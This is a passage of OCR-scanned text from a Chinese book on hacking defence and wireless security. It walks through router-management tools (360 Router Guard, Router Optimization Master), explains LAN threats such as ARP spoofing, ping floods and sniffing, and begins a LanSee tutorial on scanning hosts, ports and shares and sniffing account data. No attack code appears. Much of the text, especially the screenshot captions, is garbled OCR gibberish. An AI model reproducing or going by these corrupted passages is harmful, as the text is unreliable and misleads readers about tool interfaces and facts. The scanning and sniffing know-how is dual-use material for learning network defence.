13.3.1 360 路 由 器 卫士 


360 路 由 器 卫士 是 一 款 由 360 官 方 推 
出 的 绿色 免费 的 家 庭 必 备 无 线 网 络 管理 工 
具 。360 路 由 器 卫士 软件 功能 强大 ， 支 持 几 
乎 所 有 的 路 由 器 。 在 管理 的 过 程 中 ， 一 旦 
发 现 蹦 网 设备 想 踢 就 踢 。 下 面 介 绍 使 用 360 
路 由 器 卫士 管理 网 络 的 操作 方法 。 
[ssp 加 下 载 并 安装 360 路 由 器 卫 土 ， 双 击 桌 
面 上 的 快捷 图 标 ， 打 开 “ 路 由 器 卫士 ” 工 
作 界 面 ， 提 示 用 户 正在 连接 路 由 ， 如 下 图 
所 示 。 


13.3 


Ea 
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Ce) 正在 连接 您 的 路 由 路， 请 稍 查 


[Bee 图 连接 成 功 后 ， 弹 出 “路 由 器 卫士 提醒 您 ”对 话 框 ， 在 其 中 输入 路 由 账号 与 密码 ， 如 


下 图 所 示 。 
© 


削 锭 入 你 的 路 由 圳 栓 号 和 密码 


mee 


Ma 


[step 图 单 击 “ 下 一 步 ”按钮 ， 进 入 “我 的 路 由 ”工作 界面 ， 在 其 中 可 以 看 到 当前 的 在 线 设 
备 ， 如 下 图 所 示 。 


Mg] m0) © MM 


ww DESKToP-67NQ_ 2 
未 知 设备 人 


RS 各 双 - 
AFolG-611211.… 之 一 


如 果 想 要 对 菜 个 设备 限 速 ， 则 可 以 单 击 设备 后 的 “ 限 速 ”按钮 ， 打 开 “ 限 速 ” 对 话 
框 ， 在 其 中 设置 设备 的 上 传 速度 与 下 载 速度 ， 设 置 完 成 后 单 击 “确认 ”按钮 即 可 保存 设置， 


如 下 图 所 示 。 
限 速 
上 人 过 庆 慰 起。 |5 rae 
| Er 
吐 示 下 限 这 ， 二 高 限 过 10M 
* ~、 一 
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[step 图 在 管理 的 过 程 中 ， 
如 下 图 所 示 。 
路 由 器 卫士 
在 各 加 
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一 旦 发 现 有 蹲 网 设备 ， 可 以 单 击 该 设备 后 的 “禁止 上 网 ”按钮 ， 


路 击 二 人 扩展 I 具 路 由 议 轩 


条 各 单 (0) Oa 

aa 
al 
全 ee (TB) 


HUAWEISSFMAI.. 2* OKB/S 


IP19f Fas 1onn 10 B/s 
MMe ht 


step 较 禁止 上 网 完成 后 ， 单 击 “ 黑 名 单 ” 选 项 卡 ， 进 入 “ 黑 名 单 ” 设 置 界面 ， 在 其 中 可 以 


看 到 被 禁止 的 上 网 设备 ， 如 下 图 所 示 。 


路 由 器 卫士 


在 线 设 每 何 


sell) C 


HUAWEIWSFMAI... 2 


选择 “路 由 防 黑 ” 选 项 卡 ， 进 入 “路 由 防 黑 ”设置 界面 ， 在 其 中 可 以 对 路 由 器 进行 


防 黑 检测 ， 如 下 图 所 示 。 


路 由 器 卫 寺 


239. 
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step 鸭 单 去 “立即 检测 ”按钮 ， 即 可 开始 对 路 由 器 进行 检测 ， 并 给 出 检测 结果 ， 如 下 图 
所 示 。 


您 的 路 由 器 能 抵御 黑客 入 侵 ， 请 放心 上 网 Em 


多 DHCP 事务 9DNS 安 全 ， -网 不 吕 禄 荔 千 2 人 
加 pMz 主 机 原画 关 辣 ,不 村 末 站 果 机 去 
加 示 居 可 “二 沂 二 而 河 不 司 本 呈 客 攻 机 入 过 安全 
四 有 由 逢 管理 衬 码 枢 为 安全 不 局 该 时 大 入 信 支 e 
加 WiFiER0 本 方式 守 全 不 号 村 但 人 中 网 到 


选择 “路 由 跑 分 ”选项 卡 ， 进 入 “路 由 跑 分 ”设置 界面 ， 在 其 中 可 以 查看 当前 路 由 
器 信息 ， 如 下 图 所 示 。 


路 由 器 信息 
路 由 器 名 称 : TL-WR886N 处 理 加 架构 : MIPS 
处 理 器 型 号 ; TP9343-AL3A 无 线 传 输 束 达 : 450 Mbps 
处 理 器 品牌 : Qualcomm 内 存 : 16 MB 
处理 昭 主 频 : 750 MHz 闪存 :2MB 


[step 柄 单 击 “开始 跑 分 ”按钮 ， 即 可 开始 评估 当前 路 由 器 的 性 能 ， 如 下 图 所 示 。 


@ = 


正在 评估 路 由 器 性 能 


TL-WRBS6N 


41% 
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Step 本 评估 完成 后 ， 会 在 “路 由 跑 分 ”界面 中 给 出 跑 分 排行 榜 信 息 ， 如 下 图 所 示 。 


您 的 路 由 趴 得 分 5805 分 ， 全 辐 排 名 103692 名 ， 击 败 了 全 国 63% 的 路 由 加 1 


路 由 跑 分 排行 榜 

ws326 HUAWEI MODEL 

~ RT wresen ET 

3 Pwr-706 BEET 

TP-LINK TLWR885N 1.0 EO 

HG532E HUAVEI MODEL 有 ER 

TP-LINK TL-WR840N 3.0 攻 ER 

D-LINK DIR-600M 1 

PRaooM 


[Fe 图 选择 “路 由 设置 ”选项 卡 ， 进 入 “路 由 设置 ”界面 ， 在 其 中 可 以 对 宽带 上 网 、WiFi 
密码 、 路 由 器 密码 等 选项 进行 设置 ， 如 下 图 所 示 。 


个 wem 人) smasm > Sea 


全 earn 四 交 丙 上 网 


牙 南 时光 机 可 以 天 您 保存 上 网 帐号 和 裤 砚 东 趟 天 夫 


忘记 下 内 上 网 帐 全 ,可 以 可 任 立 即 找 可 
更 损 新 的 路 帕 器 后 ， 鬼 牙 吾 式 电 快 上 网 


Q) 1024 匀 RSA 及 128 人 2AESIn 话 ， 帐 刀 未 下 委 


到 光 机 未 开 襄 ,请 立 了 开启 


路 由 时 光 机 EE 


选择 “路 由 时 光 机 ”选项 卡 ， 在 打开 的 界面 中 单 击 “立即 开启 ”按钮 ， 即 可 打开 登 
录 界 面 ， 在 其 中 输入 360 账 号 与 密码 ， 然 后 单 击 “ 立 即 登 录 并 开启 ”按钮 ， 即 可 开启 时 光 


机 ， 如 下 图 所 示 。 


登录 您 的 360 手 机 账号 即 可 开启 时 光 机 


忘记 宝 码 。 立即 注册 


营 商 给 出 的 


号 


step 图 选择 “宽带 上 网 ”选项 卡 ， 进 入 “宽带 上 网 ”界面 ， 在 其 中 输入 网 络 运 
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上 网 账号 与 密码 ， 单 击 “ 保 存 设 置 ” 按 钮 ， 即 可 保存 设置 ， 如 下 图 所 示 。 


上 网 方式 : pppoE YY 
SS 
me 3 
宽带 上 网 
Le 


选择 “WiFi 密码 ”选项 卡 ， 进 入 “WiFi 密 码 ” 界 面 ， 在 其 中 输入 WiFi 密 码 ， 单 击 
“保存 设置 ”按钮 ， 即 可 保存 设置 ， 如 下 图 所 示 。 


nnn Bn wen (人 wowsn > sw 


WiFiS 语 。 %E5%8D3%833%6689%BO%B7%E7S6A79%915 
WHE © 
WIFI 密码 EEC 


选择 “路 由 器 密码 ”选项 卡 ， 进 入 “路 由 器 密码 ”界面 ， 在 其 中 输入 路 由 器 密码 ， 
单 击 “ 保 存 设置 ”按钮 ， 即 可 保存 设置 ， 如 下 图 所 示 。 
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Step 有 选择 “重启 路 由 器 ”选项 卡 ， 进 入 “重启 路 由 器 ”界面 ， 单 击 “ 重 启 ” 按 钮 ， 即 可 
对 当前 路 由 器 进行 重启 操作 ， 如 下 图 所 示 。 


“ss (ss 


另外 ， 使 用 360 路 由 器 卫士 在 管理 无 线 网 络 安全 的 过 程 中 ， 一 旦 检测 到 有 设备 通过 路 
由 器 上 网 ， 就 会 在 计算 机 桌面 的 右上 角 弹 出 信息 提示 框 ， 如 下 图 所 示 。 


E “iPhone%... 上 线 了 - 


单 击 “ 管 理 ” 按 钮 ， 即 可 打开 该 设备 的 详细 信息 界面 ， 在 其 中 可 以 对 网 速 进行 限制 管 
理 ， 最 后 单 击 “ 确 认 ” 按 钮 即 可 ， 如 下 图 所 示 。 


和 名 称 iPhonex206 必 


详细 信息 IP 地址 92.168.0.100 


MAC 地 址 : 。 A4-5E-60-16-7A-A1 


网 速 管理 。 mmm 


OKB/s 
当 疝 网 速 


13.3.2 ”路 由 优化 大 师 


路 由 优化 大 师 是 一 款 专业 的 路 由 器 设置 软件 ， 其 主要 功能 有 一 键 设置 优化 路 由 、 屏 广 
告 、 防 蹄 网 、 路 由 器 全 面 检测 及 高 级 设置 等 ， 从 而 保护 路 由 器 安全 。 

使 用 路 由 优化 大 师 管 理 无 线 网 络 安全 的 操作 步骤 如 下 : 
[step 图 下 载 并 安装 路 由 优化 大 师 ， 双 击 桌 面 上 的 快捷 图 标 ， 即 可 打开 “路 由 优化 大 师 ” 的 
工作 界面 ， 如 下 图 所 示 。 
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未 省 由 党 nk) 
ET admin © sbae; 


[ep 图 单 击 “登录 ”按钮 ， 打 开 RMTools 窗 口 ， 在 其 中 输入 管理 员 密码 ， 如 下 图 所 示 。 


@ RMTools = ODO x 


出 新 | 后 县 关闭 路 由 管理 URL: [http://192.168.0.1/ [ 3 保存 


[step 国 单 去 “确定 ”按钮 ， 即 可 进入 路 由 器 工作 界面 ， 在 其 中 可 以 看 到 主人 网 络 和 访客 网 
络 信息 ， 如 下 图 所 示 。 


ee = 


EI a 古 友 
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[see 加 单 击 “ 设 备 管理 ”图 标 ， 进 入 “设备 管理 ”工作 界面 ， 在 其 中 可 以 看 到 当前 无 线 网 
络 中 的 连接 设备 ， 如 下 图 所 示 。 


@ RMrooks 本 


MM | Ba ps ][em [名 | 


[ep 较 如 果 想 要 对 某 个 设备 进行 管理 ， 则 可 以 单 击 “ 管 理 ” 按 钮 ， 进 入 该 设备 的 管理 界 
面 ， 在 其 中 可 以 设置 设备 的 上 传 速度 、 下 载 速度 以 及 上 网 时 间 等 信息 ， 如 下 图 所 示 。 


2-3b-17-01 | 无 线 连 接 


@ 0KB/s @ 0KB/s 


上 传 速度 无 限制 下 载 速度 无 限制 


上 网 时 间 设 置 


step 图 单 去 “添加 允许 上 网 时 间 段 ” 超 链接 ， 即 可 打开 上 网 时 间 段 的 设置 界面 ， 在 其 中 可 
以 设置 时 间 段 描述 信息 、 开 始 时间 、 结 束 时 间 等 ， 如 下 图 所 示 。 


step 国 单 击 “确定 ”按钮 ， 即 可 完成 上 网 时 间 段 的 设置 操作 ， 如 下 图 所 示 。 
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step 国 单 击 “ 应 用 管理 ”图 标 ， 即 可 进入 “应 用 管理 ”工作 界面 ， 在 其 中 可 以 看 到 路 由 优 
化 大 师 为 用 户 提供 的 应 用 程序 ， 如 下 图 所 示 。 


IP 与 MACW 定 
版 本 :1012 大小 :23.9KR 


[step 图 如 果 想 要 使 用 某 个 应 用 程序 ， 则 可 以 单 击 菜 应 用 程序 下 的 “进入 ”按钮 ， 进 入 该 应 
用 程序 的 设置 界面 。 本 实例 单 击 “ 无 线 设备 接 入 控制 ”图 标 ， 如 下 图 所 示 。 


无 线 设备 接 入 控制 


接 入 控制 功能 


人 允许 接 入 设备 列表 
EE 


图 = MACI 址 


亩 六 允许 连 千 主人 网 疙 的 委 备 未 加 天 列表 大 中 


step 柄 单 去 “路 由 设置 ”图 标 ， 在 打开 的 界面 中 可 以 查看 当前 路 由 器 的 设置 信息 ， 如 下 图 
所 示 。 
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第 13 章 力 
二 
[RE Te sl | 


TP-LINK ID 


FTP UNK ID ET 


step 国 选择 左 侧 的 “上 网 设置 ”选项 ， 在 打开 的 界面 中 可 以 对 当前 的 上 网 信息 进行 设置 ， 


如 下 图 所 示 。 


step 图 选择 左 侧 的 “无 线 设置 ”选项 ， 在 打开 的 界面 中 可 以 对 路 由 的 无 线 功能 进行 开关 、 


名 称 、 密 码 等 信息 的 设置 ， 如 下 图 所 示 。 
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step 图 选择 左 侧 的 “LAN 口 设置 ”选项 ， 在 打开 的 界面 中 可 以 对 路 由 的 LAN 口 进行 设置 ， 
如 下 图 所 示 。 


LAN 口 设置 


step 贺 选择 左 侧 的 “DHCP 服 务 器 ”选项 ， 在 打开 的 界面 中 可 以 对 路 由 的 DHCP 服 务 器 进行 
设置 ， 如 下 图 所 示 。 


El le | 


TIP-LaNK | TL-WRes6N 


路 由 设置 DHCP 有 和 


— > 


step 图 选择 左 侧 的 “软件 升级 ”选项 ， 在 打开 的 界面 中 可 以 对 路 由 优化 大 师 的 版 本 进行 升 
级 操作 ， 如 下 图 所 示 。 


EE Bd see 怀 让 本 一 -元 


第 13 章 加 


设置 ， 如 下 图 所 示 。 


EE EH Prery [ea] 


< = 上 一 一 


step 可 选择 左 侧 的 “备份 和 载 入 配置 ”选项 ， 在 打开 的 界面 中 可 以 对 当 
行 备份 和 载 入 设置 ， 如 下 图 所 示 。 


i [a Bl sr ee Tar 喇 [ 画 


step 图 选择 左 侧 的 “重启 和 恢复 出 厂 ” 选 项 ， 在 打开 的 界面 中 可 以 对 当 
和 恢复 出 厂 设置 ， 如 下 图 所 示 。 


固 无 线 网 络 的 大 门 


Step 选择 左 侧 的 “修改 管理 员 密 码 ” 选 项 ， 在 打开 的 界面 中 可 以 对 管理 员 密 码 进 行 修改 


前 路 由 器 的 配置 进 


前 路 由 器 进 


ff 


重启 


269 


SS 黑客 攻防 与 无 线 安全 从 新 手 到 高 手 ( 超 值 版 ) 


Step 本 选择 左 侧 的 “系统 日 志 ” 选 项 ， 在 打开 的 界面 中 可 以 查看 当前 路 由 器 的 系统 日 志 信 
息 ， 如 下 图 所 示 。 


路 由 器 设备 设置 完毕 后 ， 返 回 到 路 由 优化 大 师 的 工作 界面 中 ， 选 择 “ 防 路 网 ” 选 
项 ， 在 打开 的 界面 中 可 以 进行 防 路 网 设置 ， 如 下 图 所 示 。 


二 
所 股 备 (3) 。 黑 和 名 单 0] CC 
DESKTOP-67NQBIF— C ) 
Os i C= @D 
@ ocean 1921680.112 om C= EB 
2 
DESKTOP-DSKFISE 1 
pesop ose i CE ) 3 


选择 “ 屏 广告 ”选项 ， 在 打开 的 界面 中 可 以 设置 视频 过 滤 广 告 是 否 开启 ， 如 下 图 所 示 。 
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step 图 单 击 “ 开 启 广告 过 滤 ” 按 钮 ， 即 可 开启 视频 过 小 广告 功能 ， 如 下 图 所 示 。 


aa 


视频 过 滤 广 告 已 开启 


厅 开 更 有 这 二 广告 后 . 全 用 中 肝 五 和 网， 不 全 出 观 广告 


wy 


视频 过 滤 广 告 已 开启 


TFI 六 本 后 ， 信 帮 中 出 杭 拓 不 全 出 更 广 本 


[step 图 选择 “ 测 网 速 ” 选 项 ， 进 入 网 速 测试 设置 界面 ， 如 下 图 所 示 。 


0.00mm 


wil 
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[step 图 单 击 “开启 测速 ”按钮 ， 即 可 对 当前 网 络 进行 测速 操作 ， 测 出 来 的 结果 显示 在 工作 
界面 中 ， 如 下 图 所 示 。 


最 大 楼 入 速度 为 56,34MB/ 秒 ,相当 于 50M -- 100M 的 带 完 


13.4 实战 演练 


实战 演练 1 一 一 控制 无 线 网 中 设备 的 上 网 速度 

在 无 线 局 域 网 中 所 有 的 终端 设备 都 是 通过 路 由 器 上 网 的 ， 为 了 更 好 地 管理 各 个 终端 设 
备 的 上 网 情况 ， 管 理 员 可 以 通过 路 由 器 控制 上 网 设备 的 上 网 速度 ， 具 体 的 操作 步骤 如 下 。 
[step 图 打开 路 由 器 的 Web 后 台 设 置 界面 ， 在 其 中 选择 “IP 宽 带 控制 ”选项 ， 在 右 侧 的 窗 格 
中 可 以 查看 相关 的 功能 信息 ， 如 下 图 所 示 。 


Ti waaesn x 故 


€ 人 > OO | sma 


1 二 齐 和 的 开启 与 关 半 进行 设置 * 只 有 :7 再 珊 近 提 的 总 开关 力 于 请 寺 ， 局 3 的 “天 砚 js 和 由 则 ”才能 入 
[2 


step 园 选中 “开启 IP 宽 带 控制 ” 复 选 框 ， 即 可 在 下 方 的 设置 区 域 中 对 设备 的 上 行 总 宽带 和 
下 行 总 宽带 数 进行 设置 ， 进 而 控制 终端 设置 的 上 网 速度 ， 如 下 图 所 示 。 
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x 


口 TLwRaa5N 


€ 3 OO | wa 


TP-LINK 


HiPER 


这 认 从 制 开 启 与 关闭 这 行 设置 。 夺 有 并 斋 奖 控制 和 总 开 关 为 开启 时 ， 后 续 的 “Tf 澳 训 入 所 规则 ”才能 够 
Me 


1、 庆 择机 线 了 
供 商 如 电信  P 通 等 
3、 从 改 下 而 8 天 硕 后 ， 请 点击 "保存 ” 技 簿 ， 使 天 机 生效 > 


回 开启 zf 至 亮 控制 


| TH 本 本 


Es 


[EY 


实战 演练 2 一 一 通过 修改 Wi 


Fi 名 称 隐藏 路 由 器 


WiFi 的 名 称 通常 是 指 路 由 器 当中 SSID 号 的 名 称 ， 该 名 称 可 以 根据 自己 的 需要 进行 修 
改 ， 从 而 可 以 在 一 定 程度 上 隐藏 路 由 器 ， 具 体 的 操作 步骤 如 下 。 


打开 路 由 器 的 Web 后 台 


设置 界面 ， 在 其 中 选择 “无 线 设置 ”选项 下 的 “基本 设置 ” 


选项 ， 打 开 “ 无 线 网 络 基本 设置 ”工作 界面 ， 如 下 图 所 示 。 


| 19216801 


x 于 


妇 | 


FETE 


本 页 面 设置 路 由 器 无 线 网 络 的 基本 参数 。 

SSID 吕 : TP-LINE1 

信道 : 自动 ™ 

模式 : libgn mixed ~ 

频段 带宽 : 自动 4 
回 开启 无 线 功能 
回 开户 ssro 广 播 
口 开启 ms 

保存 | | 帮助 


W 可 


修改 后 的 名 称 ， 如 下 图 所 示 。 


step 图 将 SSID 号 的 名 称 由 TP-LINK1 修 改 为 WiFi， 最 后 单 击 “ 保 存 ” 按 钮 ， 即 可 保存 WiFi 
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© TLWR885N x 


RY | 19216801 


本 页 面 设置 路 由 器 无 线 P 络 的 基本 参数 > 


ssIDB: 可 


信道: EE ~ 
模式 : im sized 
频段 带 宫 : 自动 2 
回 开 启 无 线 才能 
回 开启 ssID 广 播 
口 开启 ms 
保存 | [ 那 助 


13.5 ”小 试 身手 
练习 1: 无 线路 由 器 的 基本 设置 。 


练习 2: 无 线路 由 器 的 安全 策略 。 
练习 3: 无 线路 由 安全 管理 工具 的 使 用 。 
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无 线 局 域 网 作为 计算 机 网 络 的 一 个 重要 成 员 已 经 被 广泛 应 用 于 社会 的 各 个 领域 。 目 
前 黑客 利用 各 种 专门 攻击 无 线 局 域 网 工具 对 无 线 局 域 网 进行 攻击 ， 本 章 介绍 无 线 局 域 网 
的 安全 防护 ， 主 要 包括 无 线 局 域 网 的 查看 、 无 线 局 域 网 的 攻击 、 无 线 局 域 网 安全 辅助 工 


有 具 等 。 


14.1 无 线 局 域 网 的 安全 介绍 


目前 越 来 越 多 的 企业 建立 自己 的 无 线 
局 域 网 以 实现 企业 信息 资源 共享 或 者 在 无 
线 局 域 网 上 运行 各 类 业务 系统 。 随 着 企业 
无 线 局 域 网 应 用 范围 的 扩大 、 保 存 和 传输 
的 关键 数据 增多 ， 无 线 局 域 网 的 安全 性 问 
题 日 益 突出 。 


14.1.1 无 线 局 域 网 基础 知识 


大 家 日 常 接触 的 办 公 网 络 大 部 分 是 无 
线 局 域 网 ， 如 各 个 企业 、 学 校 、 政 府 机 关 
等 部 门 中 的 网 络 。 无 线 局 域 网 主要 用 于 一 
个 部 门 内 部 ， 常 局 限于 一 个 建筑 物 之 内 。 
在 企业 内 部 利用 无 线 局 域 网 办 公 已 成 为 其 
经 营 管理 活动 必 不 可 少 的 一 部 分 。 

无 线 局 域 网 是 指 在 某 一 区 域内 由 多 台 
计算 机 互联 成 的 计算 机 组 ， 一 般 是 方圆 几 
十 米 。 无 线 局 域 网 把 个 人 计算 机 、 工 作 站 
和 服务 器 连 在 一 起 ， 在 无 线 局 域 网 中 可 以 
进行 管理 文件 、 共 享 应 用 软件 、 共 享 打印 
机 、 安 排 工作 组 内 的 日 程 、 发 送 电 子 邮 件 
和 传真 通信 服务 等 操作 。 无 线 局 域 网 是 封 
闭 型 的 ， 可 以 由 办 公 室 内 的 两 台 计 算 机 组 
成 ， 也 可 以 由 一 个 公司 内 的 数 百 台 计 算 机 
组 成 。 

由 于 距离 较 近 ， 传 输 速率 较 快 ， 为 
10 一 1000Mb/s。 无 线 局 域 网 常见 的 分 类 方 
法 有 以 下 几 种 : 


Ring ( 令 牌 环 ) 等 。 

(2) 按 联 网 的 主机 间 的 关系 ， 可 分 
为 两 类 ， 如 对 等 网 和 C/S (客户 /服务 
器 ) 网 。 

(3) 按 使 用 的 操作 系统 不 同 可 分 为 许 
多 种 ， 如 Windows 网 和 Novell 网 。 

无 线 局 域 网 最 主要 的 特点 是 : 网 络 为 
一 个 单位 所 拥有 ， 且 地 理 范围 和 站 点 数目 
均 有 限 。 无 线 局 域 网 具有 如 下 的 一 些 主要 
优点 : 

(1) 网 内 主机 主要 为 个 人 计算 机 ， 是 
专门 适 于 微机 的 网 络 系统 。 

(2) 覆盖 范围 较 小 ， 适 于 单位 内 部 
联网 。 

(3) 传输 速率 高 ， 误 码 率 低 。 

(4) 系统 扩展 和 使 用 方便 ， 可 共享 昂 
贵 的 外 部 设备 、 软 件 和 数据 。 

(5) 可 靠 性 较 高 ， 适 于 数据 处 理 和 办 
公 自 动 化 。 

无 线 局 域 网 非常 灵活 ， 两 台 计 算 机 就 
可 以 连 成 一 个 无 线 局 域 网 。 无 线 局 域 网 的 
安全 是 内 部 网 络 安全 的 关键 ， 如 何 保证 无 
线 局 域 网 的 安全 性 成 为 网 络 安全 研究 的 一 
个 重点 。 


14.1.2 无 线 局 域 网 安全 隐患 
随 着 人 类 社会 生活 对 Internet 需 求 的 日 


益 增 长 ， 网 络 安全 逐渐 成 为 Internet 及 各 项 
网 络 服 务 和 应 用 进一步 发 展 的 关键 问题 。 
网 络 使 用 户 以 最 快速 度 获取 信息 ， 但 是 非 
公开 性 信息 的 被 盗用 和 破坏 ， 是 目前 无 线 
局 域 网 面临 的 主要 问题 。 


1. 无 线 局 域 网 病毒 


在 无 线 局 域 网 中 ， 网 络 病毒 除了 具有 
可 传播 性 、 可 执行 性 、 破 坏 性 、 隐 项 性 等 
计算 机 病毒 的 共同 特点 外 ， 还 具有 以 下 几 
个 新 特点 : 

(1) 传染 速度 快 。 在 无 线 局 域 网 中 ， 
由 于 通过 服务 器 连接 每 一 台 计 算 机 ， 这 不 
仅 给 病毒 传播 提供 了 有 效 的 通道 ， 而 且 病 
毒 传播 速度 很 快 。 在 正常 情况 下 ， 只 要 网 
络 中 有 一 台 计算 机 存在 病毒 ， 在 很 短 的 时 
间 内 ， 将 会 导致 无 线 局 域 网 内 计算 机 相互 
感染 繁殖 。 

(2) 对 网 络 破坏 程度 大 。 如 果 无 线 局 
域 网 感染 病毒 ， 将 直接 影响 到 整个 网 络 系 
统 的 工作 ， 轻 则 降低 速度 ， 重 则 破坏 服务 
器 重要 数据 信息 ， 甚 至 导致 整个 网 络 系统 
骨 溃 。 

(3) 病毒 不 易 清 除 。 清 除 无 线 局 域 网 
中 的 计算 机 病毒 ， 要 比 清除 单机 病毒 复杂 


ee 
四 2 


能 完全 消除 病毒 ， 就 可 能 使 整个 网 络 重新 
被 病毒 感染 ， 即 使 刚刚 完成 清除 工作 的 计 
算 机 ， 也 很 有 可 能 立即 被 无 线 局 域 网 中 的 
另 一 台 带 病毒 计算 机 所 感染 。 


2. ARP 攻 击 


ARP 攻 击 主要 存在 于 无 线 局 域 网 网 络 
中 ， 对 网 络 安全 危害 极 大 。ARP 攻 击 就 
是 通过 伪造 的 IP 地 址 和 MAC 地 址 ， 实 现 
ARP 欺 骗 ， 它 可 以 在 网 络 中 产生 大 量 的 
ARP 通 信 数 据 ， 使 网 络 系统 传输 发 生 阻 
塞 。 如 果 攻 击 者 持续 不 断 地 发 出 伪造 的 
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ARP 响 应 包 ， 就 能 更 改 目 标 主 机 ARP 缓 存 
中 的 IP-MAC 地 址 ， 造 成 网 络 遭 受 攻击 或 
中 断 。 


3. Ping 洪 水 攻击 


Windows 提 供 一 个 Ping 程 序 ， 使 用 它 可 
以 测试 网 络 是 否 连接 。Ping 洪 水 攻击 也 称 
为 ICMP 入 侵 ， 是 利用 Windows 系 统 的 漏洞 
来 入 侵 的 。 这 种 攻击 方式 也 称 DoS 攻 击 ( 拒 
绝 服 务 攻 击 ) ， 即 在 一 个 时 段 内 连续 向 服 
务 器 发 出 大 量 请 求 ， 服 务 器 来 不 及 响应 而 
死机 。 


4. 嗅 探 


无 线 局 域 网 是 黑客 进行 监听 嗅 探 的 
主要 场所 。 黑 客 在 无 线 局 域 网 内 的 一 个 主 
机 、 网 关上 安装 监听 程序 ， 就 可 以 监听 出 
整个 无 线 局 域 网 的 网 络 状态 、 数 据 流动 、 
传输 数据 等 信息 。 因 为 一 般 情 况 下 ， 用 户 
的 所 有 信息 ， 例 如 账号 和 密码 ， 都 是 以 明 
文 的 形式 在 网 络 上 传输 的 。 目 前 可 以 在 无 
线 局 域 网 中 进行 嗅 探 的 工具 很 多 ， 例 如 
Sniffer 等 。 


无 线 局 域 网 的 查看 


利用 专门 的 无 线 局 域 网 查看 工具 可 以 
查看 无 线 局 域 网 中 各 个 主机 的 信息 ， 本 节 
将 介绍 两 款 非常 方便 实用 的 无 线 局 域 网 查 
看 工具 。 


14.2 


14.2.1 使 用 LanSee 工 具 


局 域 网 查看 工具 (LanSee) 是 一 款 对 
局 域 网 上 的 各 种 信息 进行 查看 的 工具 。 它 
集成 了 局 域 网 搜索 功能 ， 可 以 快速 搜索 出 
计算 机 《包括 计算 机 名 、IP 地 址 、MAC 
地 址 、 所 在 工作 组 、 用 户 ) 、 共 享 资源 、 


共享 文件 ， 可 以 捕获 各 种 数据 包 (TCP、 
UDP、ICMP、ARP) ， 甚 至 可 以 从 流 过 网 
卡 的 数据 中 嗅 探 出 QQ 号 码 、 音 乐 、 视 频 、 
图 片 等 账号 、 文 件 。 

使 用 该 工具 查看 无 线 局 域 网 中 各 种 信 
息 的 具体 操作 步骤 如 下 : 
[step 图 双击 下 载 的 “局 域 网 查看 工具 ” 程 
序 ， 即 可 打开 “局 域 网 查看 工具 ” 主 窗 
口 ， 如 下 图 所 示 。 


第 14 章 无 线 局 域 网 的 安全 防护 9 


EEE 


届 计 天 宇 
ED 


CI 
[step 园 选择 “局 域 网 聊天 ”选项 ， 在 其 中 可 以 设 


VD 
non) > 区 本 
和 半 元， 置 聊天 时 使 用 的 用 户 名 和 备注 ， 如 下 图 所 示 。 
工具 | 人 地 和 | 间作 和 旭 可 和 坟 |。 通 二 
Er 加 这 X 
-a 
搜索 共享 文件 
扫 指 滑 D 
用 户 名 SOP-STGNT 长度 于 le 个 字 区 
备注“|Lasee 朋 户 | 长 度 小 于 256 个 字 节 
宙 识 明 : 以 上 设置 项 要 重新 启动 程序 才能 生效 
口 元 消息 9 声音 提醒 
的 大 =0 竺 人数 =。 当前 生 口 ; 家 RD 坟 旗 : DESKTOP.67NaalF 


[step 图 在 工具 栏 单 击 “ 工 具 选项 ”按钮 ， 
即 可 打开 “选项 ”对 话 框 ， 选 择 “ 搜 索 计 
算 机 ”选项 ， 在 其 中 设置 扫描 计算 机 的 
起 始 IP 段 和 结束 IP 地 址 段 等 属性 ， 如 下 图 
所 示 。 


选项 x 
关机 机 
[ 喝 搜 索 共 享 文件 Tr 地 址 端口 
后 阳 天 192.169.1 139 
交 丘 后 Wi 192.168.1.8 445. .1024 
地 址 高 
os) 5000 E> 3 
人 


step 图 选择 “搜索 共享 文件 ”选项 ， 在 
其 中 即 可 添加 和 删除 文件 类 型 ， 如 下 图 
所 示 。 


[m5 mm EL 


[Eee 图 选择 “扫描 端口 ”选项 ， 在 其 中 即 可 
设置 扫描 的 IP 地 址 、 端 口 、 超 时 等 属性 ， 设 
置 完毕 后 单 击 “ 保 存 ” 按 钮 ， 即 可 保存 各 
项 设置 ， 如 下 图 所 示 。 


过 机 姑 
搜索 计 其 机 
搜索 共享 文件 TT 地 站 端口 
芝 局 HE 天 100. 168.1 1 
EE 192.168.1.8 445. ,1024 
地 址 ] 端口 ] 
LE 添加 | 出 了 | 清空 
[5:0 NE] 


[sep 图 在 “局 域 网 查看 工具 ” 主 窗口 中 单 击 
“开始 ”按钮 ， 即 可 搜索 出 指定 IP 段 内 的 主 
机 ， 在 其 中 即 可 看 到 各 个 主机 的 IP 地 址 、 计 
算 机 名 、 工 作 组 、MAC 地 址 等 属性 ， 如 下 
图 所 示 。 
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0 #0: OESKTOP 6TNQBIF 


[step 国 如 果 想 与 某 个 主机 建立 连接 ， 在 搜 
索 到 的 主机 列表 中 右 击 该 主机 ， 在 弹出 的 
快捷 菜单 中 选择 “打开 计算 机 ”选项 ， 即 
可 打开 “Windows 安 全 ”对 话 框 ， 在 其 中 
输入 该 主机 的 用 户 名 和 密码 后 ， 单 击 “ 确 
定 ” 按 钮 才 可 以 与 该 按钮 建立 连接 ， 如 下 
图 所 示 。 


Windows 安全 x 


Eo 


输入 网 络 凭据 
捷 入 你 的 凭据 以 连接 到 :192.168.0.107 


域 : DESKTOP-67NQBIF 
口 记 信 的 疾 拓 
8 月 户 和 或 二 码 不 正确 . 


[step 国 在 “搜索 工具 ”栏目 下 单 击 “ 主 机 巡 
测 ” 按 钮 ， 即 可 打开 “主机 巡 测 ”窗口 ， 
此 时 可 搜索 出 在 线 的 主机 ， 在 其 中 即 可 看 
到 在 线 主机 的 人 P 地 址 、MAC 地 址 、 最 近 扫 
， 如 下 图 所 示 。 


描 时 间 等 信息 


坟 生 了 -3 半生 站 -50 。。 届 全 口 ; 主 MiE 到 主任 ，DEckTOp .67NGBIE， | 


[step 图 在 “局 域 网 查看 工具 ”中 还 可 以 对 
共享 资源 进行 设置 。 在 “搜索 工具 ”栏目 
下 单 击 “ 设 置 共享 资源 ”按钮 ， 即 可 打开 
“设置 共享 资源 ”窗口 ， 如 下 图 所 示 。 


二 3 ET 


Step 本 单 去 “共享 目录 ”文本 框 后 的 浏览 按 
钮 ， 即 可 打开 “浏览 文件 夹 ” 对 话 框 ， 如 
下 图 所 示 。 


浏览 文件 突 x 


3 者 口 ;以 机 质 。 专员 全 ;DESKTOP.67NQBIF 


请 渤 尝 文 件 突 


Y 二 软件 (D;) 和 
时 360Downloads 
时 360 安 全 Ni 攻 下载 
